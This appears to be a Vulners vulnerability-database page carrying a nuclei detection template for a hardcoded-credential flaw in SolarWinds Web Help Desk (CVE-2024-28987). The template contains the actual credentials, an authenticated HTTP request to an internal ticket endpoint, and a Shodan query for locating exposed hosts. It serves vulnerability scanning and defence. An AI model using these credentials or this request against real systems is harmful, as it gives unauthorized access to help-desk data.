Lucene search
K

SolarWinds Web Help Desk - Hardcoded Credential

🗓️ 25 Jun 2026 05:45:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 61 Views

SolarWinds Web Help Desk - Hardcoded Credential allowing remote unauthenticated access to internal functionality and data modificatio

Related
Refs
Code
id: CVE-2024-28987

info:
  name: SolarWinds Web Help Desk - Hardcoded Credential
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    The SolarWinds Web Help Desk (WHD) software is affected by a hardcoded credential vulnerability, allowing remote unauthenticated user to access internal functionality and modify data.
  impact: |
    Attackers with knowledge of the hardcoded credentials can gain unauthorized access to the SolarWinds Web Help Desk system.
  remediation: |
    Update SolarWinds Web Help Desk to a version that removes the hardcoded credentials.
  reference:
    - https://support.solarwinds.com/SuccessCenter/s/article/SolarWinds-Web-Help-Desk-12-8-3-Hotfix-2
    - https://www.solarwinds.com/trust-center/security-advisories/cve-2024-28987
    - https://nvd.nist.gov/vuln/detail/CVE-2024-28987
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2024-28987
    cwe-id: CWE-798
    epss-score: 0.93159
    epss-percentile: 0.99819
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.favicon.hash:1895809524
  tags: cve,cve2024,exposure,solarwinds,help-desk,kev,vkev,vuln

variables:
  username: "helpdeskIntegrationUser"
  password: "dev-C4F8025E7"

http:
  - raw:
      - |
        GET /helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/ HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64(username+':'+password)}}
        Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - displayClient
          - shortDetail
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100e6cca747cd8cbe22734eb7cf87d689571b3e56ca5732b919ed60239bcf8ce4ae022100f2171d20954ca243f31296ee6f653fbc9554e3a81ac69880b7dad2d6e182eaa2:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.6High risk
Vulners AI Score7.6
CVSS 3.19.1
EPSS0.93159
SSVC
61